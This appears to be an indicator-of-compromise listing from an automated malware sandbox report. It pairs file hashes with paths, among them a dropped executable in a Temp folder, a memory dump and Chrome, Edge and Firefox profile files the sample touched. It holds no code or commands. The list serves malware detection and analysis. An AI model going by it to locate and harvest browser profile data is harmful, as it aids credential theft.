MD5 030b5b0c2a5d27af64d78103ee455b0f
SHA1 157334363e98d2e260f39a7a0f53042346437d30
SHA256 cb8dc5770b3c87bf9b80ffa8623f81082ecd31da41b866aa37a3c22423c818a7
SHA512 38e6fc0d2eefd7381935853048a95fe553caf3b2b6e2e479f71da258238130c958b0b220daa91eaea8793b4f32c9509da518ba1e7a096c8e650d59e6d8ac8905

C:\ProgramData\pzmgl\aa1nozct0

MD5 a182561a527f929489bf4b8f74f65cd7
SHA1 8cd6866594759711ea1836e86a5b7ca64ee8911f
SHA256 42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914
SHA512 9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

C:\Users\Admin\AppData\Local\Temp\10109260101\f9510b80e8.exe

MD5 5e86cd25cd046c648667bdc9d733eab0
SHA1 e977e0f0a2bc4e3ace1e03e4ec5d8445de6f7427
SHA256 7195abf578a61a3c099d704d3bdbdc28f170be78bd7dcd5df64e8ffe19dfdc66
SHA512 e63bf66221c67d868c460bf6b51b89291ff6af4e91374cf24e264be469bffd5d94c3b2c14585600d3bc8b770afe429c05379f491a927b0c1b228d57cb521457c

memory/6544-1246-0x000001D44F270000-0x000001D44F278000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\AppData\Local\Temp\scoped_dir5716_182332497\b525bab9-5f51-4853-8364-6fa3c7ed1888.tmp

MD5 eae462c55eba847a1a8b58e58976b253
SHA1 4d7c9d59d6ae64eb852bd60b48c161125c820673
SHA256 ebcda644bcfbd0c9300227bafde696e8923ddb004b4ee619d7873e8a12eae2ad
SHA512 494481a98ab6c83b16b4e8d287d85ba66499501545da45458acc395da89955971cf2a14e83c2da041c79c580714b92b9409aa14017a16d0b80a7ff3d91bad2a3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 518e43baec82d2ef9e0905610e0b092a
SHA1 e9e831ceeadd177f1a21af276310e9923be2ea5f
SHA256 99e3ed7887178257a44fbea0c076a6f5d3bc2ea6d18d9131b62836c7b1514042
SHA512 76bfbb1b0f1d388b2dd2fe05f81a19a526041d72c6f2c385b2c918f8ec5701d211d162be9aa27a06ef86ccf2d5f20943f43ea485e277b067905ebe66d6910f17

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\cffd7c4d-a076-4006-a75a-6c4a1303051d.tmp

MD5 5058f1af8388633f609cadb75a75dc9d
SHA1 3a52ce780950d4d969792a2559cd519d7ee8c727
SHA256 cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA512 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 ff6782e4189696b75f01df16b0949468
SHA1 f19bee2c6f2b27a4667d870d6cb370c1843c3ca3
SHA256 871c150d3d4f5b73198680345ee4b49e2f1f18744066ce3afcea8ba5104c820c
SHA512 7a1fb48b5f23f3f5f4c93c263b31f7c2152e2ec40f6d4bc1d33d7020a62dfef06feb13736be5aba859f8d247400b2d79b701399153d3341c93378c5fb1999aab

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 63096555757810094b1af8d4aaa2d288
SHA1 a6d05e2311c5bfdab96a5726f472a78f135ed2e6
SHA256 0895c4036dab4ac52f405a3b068aa5a8c9f7f74038a07ddfed929c55d674053c
SHA512 1210a82cc615659ef71a4466b7d2fa4a927392520a94b1d7edb73737ede9981b0a7c711273979338c5e154ad8176f3fdc42b84b3244d49623617568db1254a69

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4pbd8fyu.default-release\AlternateServices.bin

MD5 9ae0e60082996d253f305487f6a78abc
SHA1 c72d3e6c46e4950b51977cb0373f0809d4c5e68b
SHA256 9932893a1ddd7d056482c1c4706e512a3906b79cd99579f08d7087cd3df08a9c
SHA512 2b2dba423e30f04f986eb485a03c2cdac319ce7de873b7c9a46ba08b2f2fb555c6fa9667569edc69fb8ce41b1c26741db5c6fa480a0555ae47925090115569ac